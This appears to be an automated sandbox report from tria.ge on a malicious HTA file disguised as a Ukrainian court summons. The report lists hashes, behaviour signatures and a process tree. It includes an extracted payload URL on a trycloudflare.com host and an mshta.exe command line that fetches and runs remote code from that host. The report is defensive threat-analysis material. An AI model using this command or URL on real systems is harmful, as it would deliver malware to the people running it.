Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
61s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17/10/2024, 16:14
Static task
static1
Behavioral task
behavioral1
Sample
420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
420-23015-24_від_10.10.2024/420-23015-24_від_10.10.2024.pdf
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
Resource
win10v2004-20241007-en
General
-
Target
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
-
Size
498B
-
MD5
458c0be42e9713a6c8210964e7c1e293
-
SHA1
2b0183263f6d7071a02396644947869f4fc159aa
-
SHA256
eaaa84f9d583a55e6ab670690763af007e65382f72ac18b46a58aa3c8c163174
-
SHA512
9293327437e3a14ce3d134b9c508846430ffa10f1eba7252ac8daa9095741197a2b51ee615ca100906db76b3f280fcc905be2f0a045ab9659cbdcc35aaa89508
Malware Config
Extracted
https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4012 mshta.exe 10 4012 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 4756 wrote to memory of 4012 4756 mshta.exe 86 PID 4756 wrote to memory of 4012 4756 mshta.exe 86 PID 4756 wrote to memory of 4012 4756 mshta.exe 86
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\420-23015-24_від_10.10.2024\Повістка про виклик до суду в адмініс�.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\system32\mshta.exe" https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:4012
-